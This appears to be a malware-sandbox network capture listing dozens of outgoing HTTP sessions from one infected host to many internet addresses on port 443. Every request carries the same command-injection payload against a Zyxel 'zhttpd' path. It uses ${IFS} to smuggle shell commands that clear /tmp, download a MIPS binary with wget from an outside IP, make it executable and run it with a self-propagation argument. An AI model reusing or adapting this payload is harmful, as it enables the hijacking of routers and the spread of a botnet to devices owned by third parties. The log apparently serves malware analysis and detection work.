                                      Jan 14, 2024 15:50:51.425384998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5592192.168.2.145750868.42.97.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.425431013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5593192.168.2.1453048102.184.213.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.425487041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5594192.168.2.144552279.201.152.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.425525904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5595192.168.2.1450410152.50.196.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.425592899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5596192.168.2.1446388220.151.164.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.425627947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5597192.168.2.1453936209.137.21.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.425692081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5598192.168.2.143581475.81.48.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.425723076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5599192.168.2.1445484102.81.153.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.425780058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5600192.168.2.1441242182.248.116.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.425810099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5601192.168.2.1444104136.144.72.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.425841093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5602192.168.2.143748461.50.65.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.425899982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5603192.168.2.14493902.75.45.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.425965071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5604192.168.2.143679051.209.181.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.426000118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5605192.168.2.1458858136.63.42.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.426039934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5606192.168.2.1449970161.175.125.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.426115990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5607192.168.2.1451822187.146.179.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.426172018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5608192.168.2.1448420110.33.14.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.426198959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5609192.168.2.1436982108.140.190.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.426237106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5610192.168.2.1457104151.123.46.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.426278114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5611192.168.2.1436290218.31.143.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.426348925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5612192.168.2.144883694.216.37.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.426407099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5613192.168.2.144978218.48.53.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.426461935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5614192.168.2.143594092.139.177.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.426486969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5615192.168.2.143327465.140.232.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.426534891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5616192.168.2.145855461.117.32.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.426593065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5617192.168.2.1446908140.161.168.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.426650047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5618192.168.2.1436934173.179.12.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.426695108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5619192.168.2.1453584155.237.248.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.426740885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5620192.168.2.1452480152.2.166.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.426804066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5621192.168.2.144339690.109.77.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.426843882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5622192.168.2.144531051.155.119.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.426887035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5623192.168.2.1448636159.84.62.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.426958084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5624192.168.2.1449380181.40.39.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.427022934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5625192.168.2.1447238110.191.59.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.427078009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5626192.168.2.1451060210.207.164.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.427133083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5627192.168.2.144406477.133.220.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.427159071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5628192.168.2.144751648.140.22.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.427218914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5629192.168.2.1440062175.146.254.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.427243948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5630192.168.2.1443200126.30.31.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.427268982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5631192.168.2.144064466.252.29.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.427330017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5632192.168.2.144632260.131.91.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.427391052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5633192.168.2.143641420.241.191.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.427455902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5634192.168.2.1438412154.116.179.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.427489996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5635192.168.2.1434512145.123.217.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.427539110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5636192.168.2.1444006191.152.48.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.427578926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5637192.168.2.144225637.192.240.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.427623987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5638192.168.2.143734074.20.161.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.427687883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5639192.168.2.14408008.123.90.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.427735090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5640192.168.2.1436612187.42.122.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.427786112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5641192.168.2.1447164203.8.182.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.427836895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5642192.168.2.1459834175.183.187.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.427911997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5643192.168.2.1453852104.154.63.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.427949905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5644192.168.2.1454144119.97.115.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.427983999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5645192.168.2.1445032201.61.208.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.428045988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5646192.168.2.144335860.95.124.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.428111076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5647192.168.2.1458682220.50.222.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.428133965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5648192.168.2.145037684.87.73.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.428174019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5649192.168.2.1458032107.77.201.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.428241968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5650192.168.2.144154851.240.169.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.428282022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5651192.168.2.1453374206.74.69.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.428324938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5652192.168.2.1445758114.209.129.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.428349972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5653192.168.2.1458774192.170.151.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:51.428376913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5654192.168.2.1433936143.247.154.237443
                                      TimestampBytes transferredDirectionData
